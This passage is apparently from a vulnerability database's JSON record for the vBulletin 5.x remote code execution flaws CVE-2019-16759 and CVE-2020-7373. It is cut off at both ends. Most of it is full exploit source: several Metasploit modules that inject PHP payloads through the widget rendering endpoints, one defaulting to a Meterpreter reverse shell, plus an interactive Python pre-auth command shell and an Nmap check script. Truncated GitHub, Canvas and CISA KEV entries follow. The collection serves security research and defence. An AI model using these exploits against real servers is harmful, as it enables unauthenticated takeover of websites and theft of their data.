\ndef cmd_payload(command) \nreturn(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\") \nend \n \ndef execute_command(command) \nresponse = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'encode_params' => true, \n'vars_post' => { \n'routestring' => 'ajax/render/widget_php', \n'widgetConfig[code]' => command \n} \n}) \nif (response) && (response.body) \nreturn response \nend \n \nreturn false \nend \n \ndef check \nrand_str = Rex::Text.rand_text_alpha(8) \nreceived = execute_command(cmd_payload(\"echo #{rand_str}\")) \nif received && received.body.include?(rand_str) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nend \nvprint_good(\"The target appears to be vulnerable.\") \n \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \ncase target['Type'] \nwhen :unix_cmd, :windows_cmd \ncmd = cmd_payload(payload.encoded) \nvprint_status(\"Generated command payload: #{cmd}\") \n \nreceived = execute_command(cmd) \nif (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\") \nprint_warning('Dumping command output in body response') \nif received.body.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(\"#{received.body}\") \nend \n \nwhen :php_memory \nvprint_status(\"Generated command payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155633/vbulletin_widgetconfig_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-02T22:58:30", "description": "", "cvss3": {}, "published": "2019-09-28T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Pre-Auth Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-28T00:00:00", "id": "PACKETSTORM:154648", "href": "https://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit', \n'Description' => %q{ \nvBulletin 5.x 0day pre-auth RCE exploit. \nThis should work on all versions from 5.0.0 till 5.5.4 \n}, \n'Platform' => 'php', \n'License' => MSF_LICENSE, \n'Author' => [ \n'Reported by: anonymous', # reported by \n'Original exploit by: anonymous', # original exploit \n'Metasploit mod by: r00tpgp', # metasploit module \n], \n'Payload' => \n{ \n'BadChars' => \"\\x22\", \n}, \n'References' => \n[ \n['CVE', 'CVE-2019-16759'], \n['EDB', 'NA'], \n['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'], \n['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759'] \n], \n'Arch' => ARCH_PHP, \n'Targets' => [ \n[ 'Automatic Targeting', { 'auto' => true } ], \n# ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], \n# ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], \n], \n'DisclosureDate' => 'Sep 23 2019', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"]) \n]) \n \nend \n \ndef check \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), \n'encode_params' => false, \n'vars_post' => \n{ \n'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\", \n} \n}) \n \nif res && res.body && res.body.include?('h4x0000r4l1f4') \nreturn Exploit::CheckCode::Vulnerable \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Sending payload.....\") \nresp = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'), \n'encode_params' => false, \n'vars_post' => \n{ \n#'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\", \n'widgetConfig[code]' => payload.encoded, \n} \n}) \n#unless resp and resp.code == 200 \n# fail_with(Failure::Unknown, \"Exploit failed.\") \n#end \n \n#print_good(\"Success!\") \n#print_line(resp.body) \n \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154648/vbulletin_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T01:26:42", "description": "", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T00:00:00", "id": "PACKETSTORM:158830", "href": "https://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# vBulletin 5.x pre-auth widget_tabbedContainer RCE exploit by @zenofex \n \nimport argparse \nimport requests \nimport sys \n \ndef run_exploit(vb_loc, shell_cmd): \npost_data = {'subWidgets[0][template]' : 'widget_php', \n'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd \n} \nr = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) \nreturn r.text \n \nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') \nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') \nARGS = ap.parse_args() \n \nwhile True: \ntry: \ncmd = input(\"vBulletin5$ \") \nprint(run_exploit(ARGS.location, cmd)) \nexcept KeyboardInterrupt: \nsys.exit(\"\\nClosing shell...\") \nexcept Exception as e: \nsys.exit(str(e)) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158830/vbulletin50-exec.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-26T23:36:58", "description": "", "cvss3": {}, "published": "2019-09-26T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x 0-Day Pre-Auth Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T00:00:00", "id": "PACKETSTORM:154623", "href": "https://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html", "sourceData": "`description = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]] \n \nlocal http = require \"http\" \nlocal shortport = require \"shortport\" \nlocal vulns = require \"vulns\" \nlocal stdnse = require \"stdnse\" \nlocal string = require \"string\" \n \n--- \n-- @usage \n-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target> \n-- \n-- @output \n-- PORT STATE SERVICE \n-- s4430/tcp open http \n-- | http-vuln-CVE-2019-16759: \n-- | VULNERABLE \n-- | vBulletin 5.x 0day pre-auth RCE exploit \n-- | State: VULNERABLE \n-- | IDs: CVE:CVE-2019-16759 \n-- | \n-- | Disclosure date: 2019-09-23 \n-- | References: \n-- | https://seclists.org/fulldisclosure/2019/Sep/31 \n-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759 \n-- \n-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is \"/\". \n \nauthor = \"r00tpgp\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = { \"vuln\" } \n \nportrule = shortport.http \n \naction = function(host, port) \nlocal vuln = { \ntitle = \"vBulletin 5.x 0day pre-auth RCE exploit\", \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]], \nIDS = { \nCVE = \"CVE-2019-16759\" \n}, \nreferences = { \n'https://seclists.org/fulldisclosure/2019/Sep/31', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-16759', \n}, \ndates = { \ndisclosure = { year = '2019', month = '09', day = '23' } \n} \n} \n \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \n \nlocal method = stdnse.get_script_args(SCRIPT_NAME..\".method\") or \"POST\" \nlocal path = stdnse.get_script_args(SCRIPT_NAME..\".path\") or \"/index.php?routestring=ajax/render/widget_php\" \n \nlocal body = { \n[\"widgetConfig[code]\"] = \"echo shell_exec(\\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\\');exit;\", \n} \n \nlocal options = { \nheader = { \nConnection = \"close\", \n[\"Content-Type\"] = \"application/x-www-form-urlencoded\", \n[\"User-Agent\"] = \"curl/7.65.3\", \n[\"Accept\"] = \"*/*\", \n}, \ncontent = body \n} \nlocal response = http.post(host, port, path, nil, nil, body) \n \nif response and string.match(response.body, \"h4x0000r\") then \nvuln.state = vulns.STATE.VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154623/http-vuln-CVE-2019-16759.nse.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-14T01:07:31", "description": "", "cvss3": {}, "published": "2020-08-13T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-13T00:00:00", "id": "PACKETSTORM:158866", "href": "https://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \nHttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] } \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.', \n'Description' => %q{ \nThis module exploits a logic bug within the template rendering code in vBulletin 5.x. \nThe module uses the vBulletin template rendering functionality to render the \n'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. \nThis causes the former template to load the latter bypassing filters originally put in place \nto address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input \nallowing the module to achieve PHP remote code execution on the target. This module has been \ntested successfully on vBulletin version 5.6.2 on Ubuntu Linux. \n}, \n'Author' => [ \n'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module \n], \n'References' => [ \n['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'], \n['CVE', '2020-7373'] \n], \n'DisclosureDate' => '2020-08-09', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'windows'], \n'Arch' => [ARCH_CMD, ARCH_PHP], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Meterpreter (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => [ARCH_PHP], \n'Type' => :php_memory, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => false \n} \n], \n[ \n'Unix (CMD In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => true \n} \n], \n[ \n'Windows (CMD In-Memory)', \n'Platform' => 'windows', \n'Arch' => ARCH_CMD, \n'Type' => :windows_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'DisablePayloadHandler' => true \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']), \nOptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']]) \n]) \n \nend \n \ndef cmd_payload(command) \n\"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\" \nend \n \ndef execute_command(command) \nresponse = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'), \n'encode_params' => true, \n'vars_post' => { \n'subWidgets[0][template]' => 'widget_php', \n'subWidgets[0][config][code]' => command \n} \n}) \nif response && response.body \nreturn response \nend \n \nfalse \nend \n \ndef check \nrand_str = Rex::Text.rand_text_alpha(8) \nreceived = execute_command(cmd_payload(\"echo #{rand_str}\")) \nif received && received.body.include?(rand_str) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \ncase target['Type'] \nwhen :unix_cmd, :windows_cmd \ncmd = cmd_payload(payload.encoded) \nvprint_status(\"Generated command payload: #{cmd}\") \n \nreceived = execute_command(cmd) \nif received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\") \nprint_warning('Dumping command output in body response') \nif received.body.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(received.body.to_s) \nend \n \nwhen :php_memory \nvprint_status(\"Generated command payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158866/vbulletin_widget_template_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:33:26", "description": "## CVE-2019-16759 \n\nvBull...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-24T16:15:10", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-26T06:48:16", "id": "AD9CC4D7-BA6E-59EF-9EFB-25F48D026054", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:21", "description": "# [CVE-2019-16759]vBulletin_Routestring-RCE-PoC\nA vulnerability ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-31T13:44:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-11-07T20:15:29", "id": "E827264A-33DB-5591-9107-3B2C883318B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:24:06", "description": "SUMMARY\n-------\nSimple NSE script to detect vBulletin 5.x 0day p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-26T03:27:17", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-09-17T11:03:18", "id": "D3A62E89-01F9-5BF8-AB5C-D80CDF936E3C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:22:21", "description": "# CVE-2019-16759 (vBulletin 5.0 < 5.5.4 - 'widg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T18:51:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-03-14T10:23:15", "id": "AA667A5B-9A75-56CD-9856-E0E33AF472EE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T07:41:35", "description": "# CVE-2019-16759 vBulletin 5.x \u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n vBulletin 5.0.0 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-29T18:49:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-07-30T18:14:45", "id": "E4B3128C-2985-55D6-AC83-E0946C875D2D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-02T12:01:58", "description": "# vbulletin5 rce\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\n\n\n\n# 0x00 \u6982\u8ff0\n\n201909 vbulletion5(5.0.0-5....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-02T16:46:43", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-07-02T07:15:43", "id": "5EE05991-6442-518F-9E3D-D23E4DFD6F1C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T21:28:06", "description": "# vBulletin RCE 5.x Get Email + SMTP\n\n# CVE-2019-16759\nThis tool...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-16T18:17:33", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-06-15T19:58:02", "id": "466BD20E-73F1-585B-8C2D-1B77366E07FB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "canvas": [{"lastseen": "2021-07-28T14:33:31", "description": "**Name**| vbulletin_widget_rce \n---|--- \n**CVE**| CVE-2019-16759 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| RCE via widgetConfig[code] paramater in vBulletin \n**Notes**| CVE Name: CVE-2019-16759 \nVENDOR: vBulletin \nNOTES: \nAn unauthenticated code execution bug can be exploited on the vBulletin core for the following versions: \n \n* 5.x.x <= 5.5.4 (Tested on Ubuntu 18.10) \n \nRepeatability: Infinite \nReferences: https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-16759 \nDate public: 23/09/2019 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-24T22:15:00", "title": "Immunity Canvas: VBULLETIN_WIDGET_RCE", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-24T22:15:00", "id": "VBULLETIN_WIDGET_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vbulletin_widget_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "vBulletin PHP Module Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-16759", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "vBulletin PHP Module Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 